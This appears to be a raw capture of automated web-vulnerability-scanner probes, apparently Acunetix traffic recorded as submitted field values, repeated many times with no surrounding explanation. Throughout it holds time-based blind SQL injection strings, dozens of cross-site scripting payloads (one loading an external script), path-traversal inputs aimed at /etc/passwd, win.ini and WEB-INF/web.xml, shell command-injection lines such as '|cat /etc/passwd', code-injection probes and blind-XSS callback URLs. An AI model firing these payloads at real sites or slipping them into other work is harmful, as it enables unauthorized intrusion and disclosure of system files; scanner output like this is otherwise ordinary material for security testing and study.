(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1&n994989=v905732

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

-1

1

1<ScRiPt >prompt(975727)</ScRiPt>

WEB-INF/web.xml

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/etc/passwd

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924143></ScRiPt>

WEB-INF\web.xml

testasp.vulnweb.com

1

1

'

)

-1))

1

1<ScRiPt >prompt(972960)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

!(()&&!|*|*|

"

1<video><source onerror="javascript:prompt(929956)">

1

LKKLOFiI'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

^(#$!@#$)(()))******

'"()

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977972)"></g></svg>

1

||cat /etc/passwd

rOxlIIF1')

1<div style=width:expression(prompt(908846))>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

1

fRB5R0l5'))

1<iframe src='data:text/html

&dir

1

1

1

1

1

1

file:///etc/passwd

-1

1<body onload=prompt(994406)>

1

'&dir&'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

'

/\../\../\../\../\../\../\../etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979360)>

http://hitFlCS1o5WL5.bxss.me/

"&dir&"

"

1

1

-1))

1

1<img src=xyz OnErRor=prompt(945505)>

acunetix_wvs_invalid_filename

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}

1

XkdxBUxg'

1

|dir

1

1<img/src=">" onerror=alert(910668)>

1

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF\web.xml

XQ7sdhX3')

1

1

'|dir

1<ScRiPt%20>prompt(962191)</sCripT>

1

comments

1

QztzPxTX'))

1

http://www.acunetix.tst

1

1

"|dir

../../../../../../../../../../windows/win.ini

comments/.

'"

1&lt

1

1

1

../../../../../../../../../../boot.ini

1

1

1

<!--

1

\xf6<img acu onmouseover=prompt(930118) //\xf6>

1

1

1

1'"()&%<ScRiPt >prompt(944179)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<input autofocus onfocus=prompt(982679)>

response.write(9952173*9388070)

'"()&%<ScRiPt >prompt(978812)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'+response.write(9952173*9388070)+'

1_930462

&cat /etc/passwd&

1

1

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9952173*9388070)+"

1

1_8pIRY <ScRiPt >prompt(926837)</ScRiPt>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../../../../../../../../../../etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

acu7384\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7384

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

${99306+99950}

acux1337\xc0\xbez1\xc0\xbcz2a\x90bcxuca1337

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

'|'ld

1<ScRiPt >prompt(934095)</ScRiPt>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<script>prompt(992012)</script>

"|"ld

1some_inexistent_file_with_long_name%00.jpg

-1

1&n948891=v942362

WEB-INF/web.xml

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(974417)</ScRiPt>

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'

WEB-INF\web.xml

1

testasp.vulnweb.com

)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990044></ScRiPt>

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"

1

1

'"()

!(()&&!|*|*|

1<ScRiPt >prompt(921312)</ScRiPt>

mZ6DoKLQ'

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

||cat /etc/passwd

1

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(974047)">

1

1

2DWu03QW')

1

1

&dir

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973116)"></g></svg>

1

1

MggfLZ78'))

1

1

1

1<div style=width:expression(prompt(992918))>

1

'

-1

'&dir&'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

-1)

1

1

1<iframe src='data:text/html

1

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

1

1<body onload=prompt(962792)>

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

http://hitnHcMF2p8uH.bxss.me/

hLr00u5K'

|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981308)>

1

comments

1

1

jnbKKrFo')

1

1<img src=xyz OnErRor=prompt(997888)>

1

'|dir

1

1

comments

1<img/src=">" onerror=alert(955897)>

6pCVstFL'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

http://www.acunetix.tst

1<ScRiPt%20>prompt(943652)</sCripT>

1

comments/.

1

1

1

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

"|dir

1

<!--

1'"()&%<ScRiPt >prompt(937916)</ScRiPt>

1

1

\xf6<img acu onmouseover=prompt(985308) //\xf6>

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(982308)</ScRiPt>

1

1

1

1

1

1<input autofocus onfocus=prompt(950878)>

1

WEB-INF\web.xml

1

response.write(9241042*9360288)

1

1_928477

1

1

'+response.write(9241042*9360288)+'

1

1

<a href='http://www.acunetix.com'>website security</a>

&cat /etc/passwd&

1

"+response.write(9241042*9360288)+"

../../../../../../../../../../windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

[url=http://www.acunetix.com]website security[/url]

1

1

1_aq2me <ScRiPt >prompt(996869)</ScRiPt>

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

../../../../../../../../../../etc/passwd

1

1

acu1486\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1486

1

................windowswin.ini

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acux6186\xc0\xbez1\xc0\xbcz2a\x90bcxuca6186

1

1

1

1

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(958991)</ScRiPt>

1

1

${99040+99199}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

'|'ld

1<script>prompt(996129)</script>

../../../../../../../../../../etc/passwd.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

-1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"|"ld

1<ScRiPt >prompt(939353)</ScRiPt>

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n986921=v982605

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981611></ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

)

1<ScRiPt >prompt(946753)</ScRiPt>

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

c1HUq8vl'

1<video><source onerror="javascript:prompt(947652)">

!(()&&!|*|*|

1

1

WEB-INF/web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989164)"></g></svg>

oVhC6Vj7')

WEB-INF\web.xml

1

||cat /etc/passwd

'"()

/etc/passwd

1

1

1

jG3G9ABe'))

1<div style=width:expression(prompt(959602))>

1

1

1

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1<iframe src='data:text/html

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

-1)

1<body onload=prompt(957461)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996873)>

"&dir&"

acunetix_wvs_invalid_filename

http://hitpyg17yp5RI.bxss.me/

1

9pkkpdIq'

"

1

1

1<img src=xyz OnErRor=prompt(937300)>

comments

1

1

|dir

X6ZmrpBS')

${@print(md5(acunetix_wvs_security_test))}

1

comments

1<img/src=">" onerror=alert(924496)>

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1<ScRiPt%20>prompt(953417)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

comments/.

CGYnQnDv'))

'|dir

/\../\../\../\../\../\../\../etc/passwd

'"

1

1&lt

1

1

1

1

"|dir

1

<!--

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(964363) //\xf6>

1

1'"()&%<ScRiPt >prompt(984902)</ScRiPt>

1

1

1

1<input autofocus onfocus=prompt(956062)>

'"()&%<ScRiPt >prompt(953288)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1_971504

1

../../../../../../../../../../windows/win.ini

1

1

1

response.write(9446592*9806268)

[url=http://www.acunetix.com]website security[/url]

1

1

'+response.write(9446592*9806268)+'

1

1

1

../../../../../../../../../../boot.ini

1_oP4iu <ScRiPt >prompt(998145)</ScRiPt>

&cat /etc/passwd&

"+response.write(9446592*9806268)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1

"&cat /etc/passwd&"

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../etc/passwd

1

................windowswin.ini

cat /etc/passwd

1

1

1

1

1

1

acu5703\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5703

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

1

1

acux3082\xc0\xbez1\xc0\xbcz2a\x90bcxuca3082

1

1

1

${100396+99439}

1<ScRiPt >prompt(975072)</ScRiPt>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<script>prompt(930423)</script>

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1&n911719=v976214

1<ScRiPt >prompt(920575)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939067></ScRiPt>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<ScRiPt >prompt(975268)</ScRiPt>

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

-1

1

1<video><source onerror="javascript:prompt(969850)">

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

-1)

!(()&&!|*|*|

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924126)"></g></svg>

-1))

1

1

^(#$!@#$)(()))******

/etc/passwd

"

'"()

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(947196))>

LApxDztU'

1

1

1

||cat /etc/passwd

1

bzCfTr9w')

1

1<iframe src='data:text/html

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

1

1

XSFuo99x'))

1<body onload=prompt(900328)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910930)>

-1

1

1

'&dir&'

1

"

-1)

1

1

1<img src=xyz OnErRor=prompt(996516)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"&dir&"

1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

-1))

1

1<img/src=">" onerror=alert(906226)>

http://hitgfYI6ZACAB.bxss.me/

|dir

1

lehvQp0n'

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

1

1

file:///etc/passwd

1<ScRiPt%20>prompt(948703)</sCripT>

'|dir

1

comments

ifHUQv9J')

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

8R9h3bVw'))

http://www.acunetix.tst

1

'"

1

\xf6<img acu onmouseover=prompt(960307) //\xf6>

1

1

1

1

WEB-INF/web.xml

"|dir

<!--

1'"()&%<ScRiPt >prompt(956240)</ScRiPt>

1<input autofocus onfocus=prompt(955514)>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(978142)</ScRiPt>

response.write(9282403*9961980)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

&cat /etc/passwd&

1_950176

../../../../../../../../../../windows/win.ini

'+response.write(9282403*9961980)+'

1

1

1_r3H2x <ScRiPt >prompt(924628)</ScRiPt>

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

1

"+response.write(9282403*9961980)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1

................windowswin.ini

1

1

`cat /etc/passwd`

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

../../../../../../../../../../etc/passwd

acu3312\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3312

1

1

|cat /etc/passwd#

1

1

acux3272\xc0\xbez1\xc0\xbcz2a\x90bcxuca3272

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

${100107+100440}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

if(now()=sysdate(),sleep(9.654),0)/*'XOR(if(now()=sysdate(),sleep(9.654),0))OR'"XOR(if(now()=sysdate(),sleep(9.654),0))OR"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(917500)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

(select(0)from(select(sleep(9.654)))v)/*'+(select(0)from(select(sleep(9.654)))v)+'"+(select(0)from(select(sleep(9.654)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1&n948614=v925946

"|"ld

1

1

../../../../../../../../../../etc/passwd.jpg

1<script>prompt(989154)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1<ScRiPt >prompt(966380)</ScRiPt>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

testasp.vulnweb.com

1

1

)

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901526></ScRiPt>

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

'

1

!(()&&!|*|*|

1

1

1<ScRiPt >prompt(921042)</ScRiPt>

XMG6FH2O'

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF\web.xml

1

^(#$!@#$)(()))******

1

1

1<video><source onerror="javascript:prompt(952122)">

vwtTJ0N7')

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951139)"></g></svg>

'"()

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

JcxRQtpJ'))

||cat /etc/passwd

1

1<div style=width:expression(prompt(933519))>

1

1

1

/etc/passwd

1

-1

1

&dir

1<iframe src='data:text/html

'

1

1

1

1

"

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

1<body onload=prompt(924843)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993620)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

comments

1

b9n4G5MR'

http://hit6CIKnfG6rA.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(986955)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

|dir

1

1

b2IQL5nk')

1

1<img/src=">" onerror=alert(953989)>

1

comments/.

1

'|dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

0jInIm9Z'))

1

1

1

file:///etc/passwd

"|dir

1

1

1

1

1<ScRiPt%20>prompt(968602)</sCripT>

/\../\../\../\../\../\../\../etc/passwd

'"

http://www.acunetix.tst

1

1

1'"()&%<ScRiPt >prompt(996006)</ScRiPt>

1

1

1&lt

<!--

1

response.write(9190692*9963928)

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(979924)</ScRiPt>

1

1

1

1

'+response.write(9190692*9963928)+'

\xf6<img acu onmouseover=prompt(986276) //\xf6>

1_927250

WEB-INF\web.xml

1

1

1

1

1<input autofocus onfocus=prompt(905334)>

"+response.write(9190692*9963928)+"

1

1

1

1

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

'&cat /etc/passwd&'

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../boot.ini

1

"&cat /etc/passwd&"

1

1

1_OMQkn <ScRiPt >prompt(959649)</ScRiPt>

1

cat /etc/passwd

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

acu8436\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8436

../../../../../../../../../../etc/passwd.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

'|'ld

acux1252\xc0\xbez1\xc0\xbcz2a\x90bcxuca1252

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

"|"ld

1<ScRiPt >prompt(983711)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(3.234),0)/*'XOR(if(now()=sysdate(),sleep(3.234),0))OR'"XOR(if(now()=sysdate(),sleep(3.234),0))OR"*/

${99216+99163}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(999072)</script>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

(select(0)from(select(sleep(3.234)))v)/*'+(select(0)from(select(sleep(3.234)))v)+'"+(select(0)from(select(sleep(3.234)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt >prompt(980299)</ScRiPt>

'

-1

1

1some_inexistent_file_with_long_name%00.jpg

1&n976689=v994448

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957442></ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

"

1<ScRiPt >prompt(948112)</ScRiPt>

1

-1))

/etc/passwd

testasp.vulnweb.com

WEB-INF/web.xml

)

1

1<video><source onerror="javascript:prompt(907011)">

1

1

||cat /etc/passwd

1

jIMTpYIN'

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(927504)"></g></svg>

1

1

^(#$!@#$)(()))******

kjwGt0a7')

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

1

1<div style=width:expression(prompt(943466))>

1

1

oPrWidzn'))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<iframe src='data:text/html

1

'&dir&'

1

-1

1

1

1<body onload=prompt(942272)>

'"()

1

1

-1)

1

'

1

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993255)>

1

1

1

"

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

file:///etc/passwd

|dir

1<img src=xyz OnErRor=prompt(960119)>

1

${@print(md5(acunetix_wvs_security_test))}

nxAdU0hK'

/\../\../\../\../\../\../\../etc/passwd

http://hitXSGUkAJdbr.bxss.me/

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

7kVmjq2h')

'|dir

1<img/src=">" onerror=alert(970022)>

acunetix_wvs_invalid_filename

1

1

1

1

WEB-INF/web.xml

Ckt9SEPz'))

1

"|dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(940764)</sCripT>

comments

WEB-INF\web.xml

1

1

1

1&lt

comments

1

1

1

1

../../../../../../../../../../windows/win.ini

http://www.acunetix.tst

\xf6<img acu onmouseover=prompt(996472) //\xf6>

comments/.

1

'"

1

1

1'"()&%<ScRiPt >prompt(989696)</ScRiPt>

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(902326)>

1

1

1

<!--

'"()&%<ScRiPt >prompt(976723)</ScRiPt>

response.write(9454726*9125336)

1

../../../../../../../../../../windows/win.ini.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1_931623

1

'+response.write(9454726*9125336)+'

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

"+response.write(9454726*9125336)+"

1

1

1_bYxCp <ScRiPt >prompt(936046)</ScRiPt>

1

................windowswin.ini

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

&cat /etc/passwd&

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

1

acu10191\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10191

1

1

1

